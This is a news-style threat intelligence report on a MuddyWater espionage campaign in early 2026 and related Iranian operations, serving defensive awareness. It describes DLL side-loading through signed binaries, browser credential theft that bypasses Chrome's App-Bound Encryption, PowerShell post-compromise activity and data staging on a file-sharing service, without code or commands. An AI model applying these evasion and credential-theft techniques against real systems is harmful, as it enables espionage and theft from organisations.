MuddyWater Espionage Campaign Hits 9 Countries in Q1 2026

An Iranian state-linked hacking group carried out a sweeping MuddyWater espionage campaign in the first quarter of 2026, compromising at least nine organizations across nine countries on four continents. The operation targeted a diverse range of sectors and relied on a layered set ofevasion techniques, including the abuse of legitimate security software, to stay hidden inside victim networks.

Who Was Targeted

The victims span a broad set of industries and geographies. A major South Korean electronics manufacturer was among the most notable targets, with attackers spending an entire week inside its network in February 2026. An international airport in the Middle East, Southeast Asian industrial manufacturers, and a Latin American financial services provider were also confirmed targets. Education institutions and public sector bodies rounded out the list.

Researchers at Symantec and Carbon Black assessed the activity as intelligence-driven. The pattern of victims suggests a focus on industrial and intellectual property theft, government intelligence, and access to the corporate networks of downstream partners.

DLL Side-Loading at the Core of the Attack

The defining technique in this MuddyWater espionage campaign was DLL side-loading. This is a method that exploits the way Windows applications locate and load supporting library files. Attackers paired malicious DLLs with legitimately signed executables to make their activity appear benign.

Two binaries were abused. The first, fmapp.exe, is an audio application signed by Fortemedia. It was used to sideload a malicious file named fmapp.dll, which establishes a connection to an attacker-controlled server. This same binary appeared in an earlier MuddyWater operation known as Operation Olalampo, which targeted organizations across the Middle East and North Africa.

The second binary, sentinelmemoryscanner.exe, is associated with a legitimate security product. Researchers assessed its selection as deliberate. Because it carries a trusted signature tied to a known cybersecurity vendor, it is well-positioned to bypass signature-based detection. It was used to sideload a rogue DLL named sentinelagentcore.dll.

Stealing Credentials Through the Browser

Both malicious DLLs embedded an open-source tool called ChromElevator, which is designed to extract passwords, cookies, and payment card data from Chromium-based browsers. Crucially, ChromElevator is capable of bypassing Chrome's App-Bound Encryption, a protection Google introduced specifically to prevent this type of credential theft.

The inclusion of ChromElevator in both sideloading chains suggests credential harvesting was a primary objective. Combined with lateral movement activity, the stolen credentials gave attackers a path deeper into each victim environment.

PowerShell, Node.js, and Living Off the Land

Beyond DLL abuse, the MuddyWater espionage campaign made heavy use of native system tools to conduct post-compromise operations. A Node.js-based implant chain was used to launch PowerShell scripts responsible for reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunneling.

In at least one case, stolen data was staged on sendit.sh, a public file-transfer service, before being pulled by the attackers. This approach keeps exfiltration traffic off attacker-controlled infrastructure and blends more naturally with normal web activity.

Inside the South Korean manufacturer's network, attackers repeatedly re-executed both signed binaries to confirm they still had access. Researchers described the cadence as consistent with implant-driven activity rather than continuous hands-on operator presence: a sign of a more automated and operationally disciplined approach.

A Measurable Step Up in Operational Hygiene

None of the individual techniques used in this campaign are new. DLL side-loading, PowerShell abuse, and browser credential theft are all well-documented in the threat landscape. What stands out is how MuddyWater combined them and the care taken to avoid detection at each stage.

Researchers noted the group has moved toward quieter, more disciplined operations compared to its activity two or three years ago. The deliberate choice to abuse a security vendor's signed binary, specifically to exploit the trust that code signing is meant to convey, reflects a meaningful shift in how the group manages operational risk.

MuddyWater has been active since at least 2017 and operates under Iran's Ministry of Intelligence and Security. Earlier in 2026, separate activity tied to the group involved U.S. targets including a bank, an airport, and a defense-adjacent software supplier. That campaign introduced a previously undocumented backdoor called Dindoor alongside a Python-based tool named Fakeset.

The Broader Iranian Threat Picture

The campaign comes alongside wider Iranian cyber activity in 2026. The European Council sanctioned Iranian company Emennet Pasargad, also known as Shahid Shushtari and affiliated with Iran's Islamic Revolutionary Guard Corps Cyber-Electronic Command, for hacking a Swedish SMS service, stealing and selling a French subscriber database, and compromising advertising billboards during the 2024 Paris Olympics to spread disinformation.

A separate Iran-linked campaign, attributed to Iran's Ministry of Intelligence and Security and initially claimed by a pro-Iranian persona, hit organizations in the United States, Israel, Saudi Arabia, and Turkey between late March and early April 2026. At least two U.S. victims faced destructive operations, including deletion of partitions and data backups. That campaign used a custom C++ exfiltration tool internally named FileFiend, capable of enumerating local drives and SMB shares before sending data to a hardcoded command-and-control server.

The scale and variety of these operations underline a consistent pattern: Iranian threat actors are expanding their geographic reach, refining their tools, and blending espionage with disruptive activity in ways that complicate attribution and response.